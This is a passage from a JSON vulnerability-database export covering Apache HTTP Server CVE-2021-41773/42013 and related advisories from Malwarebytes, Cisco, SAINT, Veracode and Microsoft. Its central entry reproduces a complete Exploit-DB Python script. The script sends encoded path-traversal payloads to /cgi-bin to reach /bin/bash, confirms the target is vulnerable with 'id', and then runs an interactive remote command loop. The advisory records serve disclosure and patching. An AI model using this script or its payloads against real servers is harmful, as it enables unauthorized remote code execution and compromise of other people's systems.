It was discovered three weeks ago, fixed late last month, and incorporated now in version 2.4.50.\n\n### Mitigation\n\nAll users should install the latest version as soon as possible, but:\n\n * Users that have not installed 2.4.49 yet should skip this version in their update cycle and go straight to 2.4.50.\n * Users that have 2.4.49 installed should configure \u201crequire all denied\u201d if they do not plan to patch quickly, since this blocks the attack that has been seen in the wild.\n\nA full list of vulnerabilities in Apache HTTP Server 2.4 can be found [here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Update, October 8 \n\nApache has issued a new patch. According to the release notes for version 2.4.51\u2026\n\n> \u2026the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThe new part of the vulnerability is listed under [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). The "require all denied" setting blocks attacks using this vulnerability as well. 
Time to patch the patch.\n\nStay safe, everyone!\n\nThe post [[Updated, again] Apache fixes zero-day vulnerability in HTTP Server](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-06T14:23:08", "type": "malwarebytes", "title": "[Updated, again] Apache fixes zero-day vulnerability in HTTP Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T14:23:08", "id": "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cisco": [{"lastseen": "2022-12-17T06:19:59", "description": "On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:\n CVE-2021-41524: Null Pointer Dereference Vulnerability CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\nFor descriptions of these vulnerabilities, see the Apache Security Announcement [\"https://httpd.apache.org/security/vulnerabilities_24.html\"]. 
For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers [\"https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html\"].\n\nCisco investigated its product line and concluded that no Cisco products are affected by these vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:00:00", "type": "cisco", "title": "Apache HTTP Server Vulnerabilities: October 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:00:00", "id": "CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:03:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-41773", "2021-42013", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50512", "href": "https://www.exploit-db.com/exploits/50512", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\r\n# Date: 11/11/2021\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\r\n# Tested on: Debian GNU/Linux\r\n# CVE : CVE-2021-41773 / CVE-2021-42013\r\n# Credits : Lucas Schnell\r\n\r\n\r\n#!/usr/bin/env python3\r\n#coding: utf-8\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport requests\r\nfrom colorama import Fore,Style\r\n\r\n\r\nheader = '''\\033[1;91m\r\n \r\n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \r\n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 
\u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \r\n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \r\n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \r\n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\r\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\r\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\r\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 
\u2591\u2591 \u2591 \u2591 \u2591 \r\n''' + Style.RESET_ALL\r\n\r\n\r\nif len(sys.argv) < 2 :\r\n print( 'Use: python3 file.py ip:port ' )\r\n sys.exit()\r\n\r\ndef end():\r\n print(\"\\t\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\ndef commands(url,command,session):\r\n directory = mute_command(url,'pwd')\r\n user = mute_command(url,'whoami')\r\n hostname = mute_command(url,'hostname')\r\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\r\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \r\n command = f\"echo; {command};\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n print(output)\r\n if 'clear' in command:\r\n os.system('/usr/bin/clear')\r\n print(header)\r\n if 'exit' in command:\r\n end()\r\n\r\ndef mute_command(url,command):\r\n session = requests.Session()\r\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n return response.text.strip()\r\n\r\n\r\ndef exploitRCE(payload):\r\n s = requests.Session()\r\n try:\r\n host = sys.argv[1]\r\n if 'http' not in host:\r\n url = 'http://'+ host + payload\r\n else:\r\n url = host + payload \r\n session = requests.Session()\r\n command = \"echo; id\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n if \"uid\" in output:\r\n choice = \"Y\"\r\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\r\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\r\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? 
(Y/n) : \")\r\n if choice.lower() in ['','y','yes']:\r\n while True:\r\n commands(url,command,session) \r\n else:\r\n end() \r\n else :\r\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\r\n except KeyboardInterrupt:\r\n end()\r\n\r\ndef main():\r\n try:\r\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\r\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\r\n payloads = [apache2449_payload,apache2450_payload]\r\n choice = len(payloads) + 1\r\n print(header)\r\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\r\n while choice >= len(payloads) and choice >= 0:\r\n choice = int(input('[~] Choice : '))\r\n if choice < len(payloads):\r\n exploitRCE(payloads[choice])\r\n except KeyboardInterrupt:\r\n print(\"\\n\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50512", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2022-01-26T11:31:53", "description": "Added: 08/27/2021 \n\n\n### Background\n\n[Sophos UTM](<https://www.sophos.com/en-us/products/unified-threat-management.aspx>) is a network security appliance. \n\n### Problem\n\nA vulnerability in the Webadmin interface allows remote attackers to execute arbitrary commands by sending a specially crafted POST request. \n\n### Resolution\n\nUpgrade to Sophos SG UTM v9.511 MR11, v9.607 MR7, or v9.705 MR5 or higher. \n\n### References\n\n<https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223> \n<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223> \n\n\n### Limitations\n\nExploit works on Sophos UTM v9.701 and possibly other versions. 
\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T00:00:00", "type": "saint", "title": "Sophos UTM Webadmin remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-08-27T00:00:00", "id": "SAINT:3AB9E5583CEF507F3F7486F6FF1A59BA", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/sophos_utm_webadmin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Added: 08/27/2021 \n\n\n### Background\n\n[Sophos UTM](<https://www.sophos.com/en-us/products/unified-threat-management.aspx>) is a network security appliance. \n\n### Problem\n\nA vulnerability in the Webadmin interface allows remote attackers to execute arbitrary commands by sending a specially crafted POST request. \n\n### Resolution\n\nUpgrade to Sophos SG UTM v9.511 MR11, v9.607 MR7, or v9.705 MR5 or higher. 
\n\n### References\n\n<https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223> \n<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223> \n\n\n### Limitations\n\nExploit works on Sophos UTM v9.701 and possibly other versions. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-27T00:00:00", "type": "saint", "title": "Sophos UTM Webadmin remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-08-27T00:00:00", "id": "SAINT:4A73A5CD7FE341977E86117842CBB67D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sophos_utm_webadmin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:32:06", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. 
\n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:E5FBEA63E5EE8A91F5066541141037D1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:36:50", "description": "Added: 09/28/2021 \n\n\n### 
Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "href": 
"http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-08T18:37:00", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:34:08", "description": "squid is vulnerable to denial of service (DoS). The vulnerability exists through an incorrect memory management bug that affects all clients using the proxy.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-14T21:08:26", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-06-14T11:23:57", "id": "VERACODE:30435", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30435/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T16:52:25", "description": "squid is vulnerable to denial of service (DoS). 
The vulnerability exists through an improper input validation, affecting all clients using the proxy.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-14T21:08:30", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-06-14T11:25:30", "id": "VERACODE:30436", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30436/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-08-16T19:28:11", "description": "Apache HTTP Server is vulnerable to path traversal attacks. 
An attacker could use a path traversal attack to map URLs to files outside of the document root that are not protected by the \u201crequire all denied\u201d directive in the Apache configuration file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T21:08:53", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-15T14:29:33", "id": "VERACODE:32442", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32442/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:33:44", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Open Management Infrastructure Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-20T07:00:00", "id": "MS:CVE-2021-38647", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": 